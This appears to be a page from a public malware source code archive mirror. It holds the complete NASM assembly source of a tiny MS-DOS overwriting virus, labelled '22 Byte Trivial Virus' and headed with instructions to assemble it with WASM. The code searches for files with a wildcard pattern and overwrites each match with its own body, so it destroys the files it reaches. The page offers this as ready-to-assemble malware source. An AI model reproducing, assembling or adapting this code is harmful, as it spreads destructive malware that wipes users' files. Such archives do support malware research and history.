13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.triv22.asm
2021-01-12 18:01:59 -06:00

18 lines
205 B
NASM

;22 Byte Trivial Virus
;Use WASM to assemble
org 100h
db '*.*',0
mov ah,4eh
Again
mov dx,si
int 21h
mov ah,3ch
mov dx,9eh
int 21h
xchg bx,ax
mov ah,40h
jmps Again